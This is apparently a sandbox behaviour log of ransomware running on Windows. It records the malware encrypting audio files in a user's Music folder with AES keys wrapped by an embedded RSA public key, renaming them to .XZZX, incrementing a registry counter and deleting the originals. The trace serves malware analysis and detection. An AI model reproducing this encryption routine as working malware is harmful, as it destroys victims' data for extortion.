(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\xN7YDKwcce9C5peK.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\xn7ydkwcce9c5pek.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x56c [0118.702] ReadFile (in: hFile=0x56c, lpBuffer=0x3cbffd0, nNumberOfBytesToRead=0x11b8, lpNumberOfBytesRead=0x420e418, lpOverlapped=0x0 | out: lpBuffer=0x3cbffd0*, lpNumberOfBytesRead=0x420e418*=0x11b8, lpOverlapped=0x0) returned 1 [0118.703] CloseHandle (hObject=0x56c) returned 1 [0118.703] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0118.704] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40e0000 [0118.704] SetErrorMode (uMode=0x1) returned 0x1 [0118.704] lstrcpyW (in: lpString1=0x420e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0118.704] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3cc6768) returned 1 [0118.707] CryptGenKey (in: hProv=0x3cc6768, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3a5790) returned 1 [0118.905] CryptExportKey (in: hKey=0x3a5790, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x420e41c | out: pbData=0x0*, pdwDataLen=0x420e41c*=0x94) returned 1 [0118.905] CryptExportKey (in: hKey=0x3a5790, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40e0000, pdwDataLen=0x420e41c | out: pbData=0x40e0000*, pdwDataLen=0x420e41c*=0x94) returned 1 [0118.905] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0118.906] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0118.906] CryptDestroyKey (hKey=0x3a5790) returned 1 [0118.906] CryptReleaseContext (hProv=0x3cc6768, dwFlags=0x0) returned 1 [0118.906] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\38DC595E3788A5BA7503B1493BA98A02.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\38dc595e3788a5ba7503b1493ba98a02.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x56c [0118.906] WriteFile (in: hFile=0x56c, lpBuffer=0x3cbffd0*, nNumberOfBytesToWrite=0x11b8, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3cbffd0*, lpNumberOfBytesWritten=0x420e438*=0x11b8, lpOverlapped=0x0) returned 1 [0118.907] SetFilePointer (in: hFile=0x56c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x11b8 [0118.907] WriteFile (in: hFile=0x56c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0118.907] SetFilePointer (in: hFile=0x56c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x11bd [0118.907] WriteFile (in: hFile=0x56c, lpBuffer=0x420f860*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x420f860*, lpNumberOfBytesWritten=0x420e438*=0x28, lpOverlapped=0x0) returned 1 [0118.907] SetFilePointer (in: hFile=0x56c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x11e5 [0118.907] WriteFile (in: hFile=0x56c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0118.907] SetFilePointer (in: hFile=0x56c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x11ea [0118.907] SetErrorMode (uMode=0x1) returned 0x1 [0118.907] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0118.907] OutputDebugStringW (lpOutputString="end") [0118.907] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----và\x83Ê\x03`Õ \x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0118.907] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x420dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8 | out: pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8) returned 1 [0118.907] CryptAcquireContextW (in: phProv=0x420d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x420d3e4*=0x3cc6768) returned 1 [0118.908] CryptImportPublicKeyInfo (in: hCryptProv=0x3cc6768, dwCertEncodingType=0x1, pInfo=0x3cb1018*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cb1048*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cb1050*, PublicKey.cUnusedBits=0x0), phKey=0x420d3ec | out: phKey=0x420d3ec*=0x3a5ad0) returned 1 [0118.908] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0118.908] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0118.909] CryptEncrypt (in: hKey=0x3a5ad0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x420d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x420d3f0*=0x80) returned 1 [0118.909] CryptEncrypt (in: hKey=0x3a5ad0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cc67f0*, pdwDataLen=0x420d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cc67f0*, pdwDataLen=0x420d3e8*=0x80) returned 1 [0118.909] WriteFile (in: hFile=0x56c, lpBuffer=0x3cc67f0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3cc67f0*, lpNumberOfBytesWritten=0x420e438*=0x80, lpOverlapped=0x0) returned 1 [0118.909] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0118.909] WriteFile (in: hFile=0x56c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0118.909] GetUserNameW (in: lpBuffer=0x420e1f8, pcbBuffer=0x420dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x420dfe0) returned 1 [0118.909] wsprintfW (in: param_1=0x420dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0118.909] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe4 | out: phkResult=0x420dfe4*=0x568) returned 0x0 [0118.909] RegQueryValueExW (in: hKey=0x568, lpValueName="E1010314", lpReserved=0x0, lpType=0x420dfd8, lpData=0x420dfec, lpcbData=0x420dfdc*=0x4 | out: lpType=0x420dfd8*=0x4, lpData=0x420dfec*=0x75, lpcbData=0x420dfdc*=0x4) returned 0x0 [0118.909] RegCloseKey (hKey=0x568) returned 0x0 [0118.909] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe8 | out: phkResult=0x420dfe8*=0x568) returned 0x0 [0118.909] RegSetValueExW (in: hKey=0x568, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x420dfec*=0x76, cbData=0x4 | out: lpData=0x420dfec*=0x76) returned 0x0 [0118.909] RegCloseKey (hKey=0x568) returned 0x0 [0118.909] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0118.910] VirtualFree (lpAddress=0x40e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0118.910] CloseHandle (hObject=0x56c) returned 1 [0118.911] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0118.911] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0118.911] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\xN7YDKwcce9C5peK.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\xn7ydkwcce9c5pek.mp3")) returned 1 [0118.912] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\xN7YDKwcce9C5peK.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\xn7ydkwcce9c5pek.mp3")) returned 0 Thread: id = 382 os_tid = 0x900 [0119.066] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0119.066] lstrcpyW (in: lpString1=0x420f460, lpString2="zCdoEQ.wav" | out: lpString1="zCdoEQ.wav") returned="zCdoEQ.wav" [0119.066] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0119.066] SetErrorMode (uMode=0x1) returned 0x1 [0119.066] lstrcpyW (in: lpString1=0x420f860, lpString2="zCdoEQ.wav" | out: lpString1="zCdoEQ.wav") returned="zCdoEQ.wav" [0119.066] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x500f11cf, Data2=0x2fc2, Data3=0x4423, Data4=([0]=0x81, [1]=0x69, [2]=0xb2, [3]=0xec, [4]=0x9c, [5]=0xff, [6]=0x52, [7]=0x36))) returned 0x0 [0119.066] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\zCdoEQ.wav") returned 83 [0119.066] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0119.066] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\6FB07FDE0CB60F86500F11CF10D6F3CE.XZZX") returned 110 [0119.066] StrStrW (lpFirst="zCdoEQ.wav", lpSrch="XZZX") returned 0x0 [0119.066] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\zCdoEQ.wav", dwFileAttributes=0x20) returned 1 [0119.066] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\zCdoEQ.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\zcdoeq.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x564 [0119.067] ReadFile (in: hFile=0x564, lpBuffer=0x3ccd980, nNumberOfBytesToRead=0x153d7, lpNumberOfBytesRead=0x420e418, lpOverlapped=0x0 | out: lpBuffer=0x3ccd980*, lpNumberOfBytesRead=0x420e418*=0x153d7, lpOverlapped=0x0) returned 1 [0119.068] CloseHandle (hObject=0x564) returned 1 [0119.068] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0119.069] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40e0000 [0119.069] SetErrorMode (uMode=0x1) returned 0x1 [0119.069] lstrcpyW (in: lpString1=0x420e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0119.069] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3cc6878) returned 1 [0119.072] CryptGenKey (in: hProv=0x3cc6878, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3a5790) returned 1 [0119.339] CryptExportKey (in: hKey=0x3a5790, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x420e41c | out: pbData=0x0*, pdwDataLen=0x420e41c*=0x94) returned 1 [0119.339] CryptExportKey (in: hKey=0x3a5790, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40e0000, pdwDataLen=0x420e41c | out: pbData=0x40e0000*, pdwDataLen=0x420e41c*=0x94) returned 1 [0119.339] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0119.339] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0119.339] CryptDestroyKey (hKey=0x3a5790) returned 1 [0119.340] CryptReleaseContext (hProv=0x3cc6900, dwFlags=0x0) returned 0 [0119.340] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\6FB07FDE0CB60F86500F11CF10D6F3CE.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\6fb07fde0cb60f86500f11cf10d6f3ce.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x574 [0119.340] WriteFile (in: hFile=0x574, lpBuffer=0x3ccd980*, nNumberOfBytesToWrite=0x153d7, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3ccd980*, lpNumberOfBytesWritten=0x420e438*=0x153d7, lpOverlapped=0x0) returned 1 [0119.342] SetFilePointer (in: hFile=0x574, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x153d7 [0119.342] WriteFile (in: hFile=0x574, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0119.342] SetFilePointer (in: hFile=0x574, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x153dc [0119.342] WriteFile (in: hFile=0x574, lpBuffer=0x420f860*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x420f860*, lpNumberOfBytesWritten=0x420e438*=0x14, lpOverlapped=0x0) returned 1 [0119.342] SetFilePointer (in: hFile=0x574, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x153f0 [0119.342] WriteFile (in: hFile=0x574, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0119.342] SetFilePointer (in: hFile=0x574, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x153f5 [0119.342] SetErrorMode (uMode=0x1) returned 0x1 [0119.342] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0119.342] OutputDebugStringW (lpOutputString="end") [0119.343] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v0\x88Ê\x03`Õ \x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.343] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x420dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8 | out: pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8) returned 1 [0119.343] CryptAcquireContextW (in: phProv=0x420d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x420d3e4*=0x3cc6988) returned 1 [0119.343] CryptImportPublicKeyInfo (in: hCryptProv=0x3cc6988, dwCertEncodingType=0x1, pInfo=0x3cb11b8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cb11e8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cb11f0*, PublicKey.cUnusedBits=0x0), phKey=0x420d3ec | out: phKey=0x420d3ec*=0x3a5790) returned 1 [0119.343] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0119.344] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0119.344] CryptEncrypt (in: hKey=0x3a5790, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x420d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x420d3f0*=0x80) returned 1 [0119.344] CryptEncrypt (in: hKey=0x3a5790, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cc6a10*, pdwDataLen=0x420d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cc6a10*, pdwDataLen=0x420d3e8*=0x80) returned 1 [0119.344] WriteFile (in: hFile=0x574, lpBuffer=0x3cc6a10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3cc6a10*, lpNumberOfBytesWritten=0x420e438*=0x80, lpOverlapped=0x0) returned 1 [0119.344] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0119.344] WriteFile (in: hFile=0x574, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0119.344] GetUserNameW (in: lpBuffer=0x420e1f8, pcbBuffer=0x420dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x420dfe0) returned 1 [0119.345] wsprintfW (in: param_1=0x420dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0119.345] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe4 | out: phkResult=0x420dfe4*=0x580) returned 0x0 [0119.345] RegQueryValueExW (in: hKey=0x580, lpValueName="E1010314", lpReserved=0x0, lpType=0x420dfd8, lpData=0x420dfec, lpcbData=0x420dfdc*=0x4 | out: lpType=0x420dfd8*=0x4, lpData=0x420dfec*=0x76, lpcbData=0x420dfdc*=0x4) returned 0x0 [0119.345] RegCloseKey (hKey=0x580) returned 0x0 [0119.345] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe8 | out: phkResult=0x420dfe8*=0x580) returned 0x0 [0119.345] RegSetValueExW (in: hKey=0x580, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x420dfec*=0x77, cbData=0x4 | out: lpData=0x420dfec*=0x77) returned 0x0 [0119.345] RegCloseKey (hKey=0x580) returned 0x0 [0119.345] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0119.346] VirtualFree (lpAddress=0x40e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0119.346] CloseHandle (hObject=0x574) returned 1 [0119.348] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0119.348] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0119.349] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\zCdoEQ.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\zcdoeq.wav")) returned 1 [0119.349] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\zCdoEQ.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\zcdoeq.wav")) returned 0 Thread: id = 383 os_tid = 0x904 [0119.283] lstrcpyA (in: lpString1=0x434fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0119.283] lstrcpyW (in: lpString1=0x434f460, lpString2="_iJcWlMQ1CRXwuy.m4a" | out: lpString1="_iJcWlMQ1CRXwuy.m4a") returned="_iJcWlMQ1CRXwuy.m4a" [0119.283] lstrcpyW (in: lpString1=0x434e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0119.283] 